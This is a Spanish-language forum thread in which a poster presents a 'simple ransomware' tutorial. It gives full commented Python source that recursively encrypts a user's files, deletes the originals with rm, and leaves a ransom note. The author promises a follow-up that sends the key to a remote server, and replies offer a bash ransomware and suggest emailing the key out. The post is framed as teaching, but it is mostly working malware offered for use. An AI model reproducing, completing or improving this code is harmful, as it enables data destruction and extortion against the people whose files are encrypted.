Ransomware #1

Iniciado por 000000 000000, Febrero 08, 2020, 10:37:27 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 08, 2020, 10:37:27 AM Ultima modificación: Febrero 09, 2020, 05:42:22 PM por Bartz
Hola buenas, antes de comenzar quería decirles que no pongan en los comentarios cosas como | COMO SUBES ESTE CONTENIDO o ESTAS LOCO AL SUBIR ESTO| ya que he sido autorizado para subirlo a demás esto no solo sirve para atacar también sirve para saber como funciona uno, sabiendo eso continuemos.

Bienvenidos, a la primera parte de esta serie, los ransomeware, en este artículo veremos que es, y haremos uno sencillo, comencemos!

DEFINICIÓN.


El ransomeware es un tipo de malware, que cifra información del usuario y generalmente pide dinero por ella como el gran conocido WannaCry, el mencionado anteriormente se distribuía generalmente por una vulnerabilidad y por eso creció tanto.

Para cifrar la información se suelen usar algoritmos como AES256 el cual es muy seguro y por lo tanto no podremos recuperar los archivos fácilmente, generalmente envía la clave a un servidor remoto en el ejemplo que voy a mostrar no se enviará, eso lo haré si veo que este post en bien recibido por ustedes  ;).



CREANDO UN RANSOMEWARE SIMPLE + VÍDEO DEMOSTRATIVO.


Después de saber que es un ransomeware pasemos a la parte práctica. El siguiente ransomeware será programado en python3, debido a que es sencillo y potente a demas de que es mi lenguaje favorito.

CÓDIGO COMENTADO.
Código: python


import os, simplecrypt, random #Importamos las librerías simplecrypt no viene por default en python pero a continuacion veremos la solución.
from getpass import getuser

user = getuser()
rut = "/home/user/Desktop/Prueba/"
ruta = rut.replace("user", user) #Conseguímos el nombre de usuario
os.system("curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py ; python get-pip.py ; pip install simplecrypt ; rm get-pip.py") # Comandos que instalan la librería simplecrypt

longitud = 20
char = "abcdefghijklmnopqrstuvwyz1234567890"
password = ""
while longitud != 0:
password += random.choice(char) # Generamos una clave aleatória de 20 caracteres con todas las letras y números.
    longitud -= 1


def cifrar(carpeta):
for archivo in os.listdir(carpeta):
elementos = os.path.join(carpeta,archivo)
if os.path.isdir(os.path.join(carpeta,archivo)):
cifrar(os.path.join(carpeta,archivo)) # Encontramos todos los ficheros de un directorio
try:
leer = open(elementos, "rb")
interior = leer.read()
os.system("rm " + elementos)
archivofinal = simplecrypt.encrypt(elementos, password)
directoriocifrado = elementos + ".crypt"
abrir = open(directoriocifrado, "wb")
abrir.write(archivofinal)
abrir.close() # Ciframos eliminamos y escribimos el resultado cifrado si puede ya que si se encuentra con una carpeta no la podrá cifrar

except:
variable = 0
variable -= 1 # Hace algo inútil si encuentra algo que no puede cifrar


def recuperar():
recuperar = open("Recuperararchivos.txt", "w")
recuperar.write("DAME MIS KIBABS y te los doy (^3^)")
recuperar.write("\n")
recuperar.write(password)
recuperar.close() # Escribe el mensaje de recuperación pero también escribe la contraseña.


cifrar("/home/linuxpower/Desktop/Prueba")
recuperar() # Llama a las funciones


VÍDEO DEMOSTRATIVO.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.  ;)

Febrero 08, 2020, 12:32:06 PM #1 Ultima modificación: Febrero 08, 2020, 12:54:20 PM por DtxdF
Muy buen post, te feiicito por lo que estás haciendo (Enseñar).

Generalmente los ransomwares usan «Números pseudo-aleatorios criptográficamente seguros», lo cifran con un algoritmo simétrico robusto (usando los números mencionados anteriormente) y almacenan las claves con un algoritmo de cifrado asimétrico en la misma base de datos restringiendo cada vez más atacarlos.

En conclusión, ¡SON UNOS DESGRACIADOS!

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy buen post, te feiicito por lo que estás haciendo (Enseñar).

Generalmente los ransomwares usan «Números pseudo-aleatorios criptográficamente seguros», lo cifran con un algoritmo simétrico robusto (usando los números mencionados anteriormente) y almacenan las claves con un algoritmo de cifrado asimétrico en la misma base de datos restringiendo cada vez más atacarlos.

En conclusión, ¡SON UNOS DESGRACIADOS!

~ DtxdF

Gracias! Ese en concreto usa AES256 osea que ajajaaj

Hola, me parece genial el ransomware en python, justo yo tenia un proyecto parecido que estuve avanzando el año pasado el mi caso lo hice en bash, ahi lo pongo para quien quiera darle una revisada :D !

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos,

EduardoDesdes,

Excelente post tenia dudas como hacer un ransoware en python!

primero vi el video en youtube , no pense que estuvieras en undercode

Buenas,

Hablo desde el desconocimiento...
Una alternativa para enviar la llave no podría ser también enviarla por mail a algún correo?


muy bueno bro siempre me pregunte como era el codigo fuente de un ransomware y su funcionamiento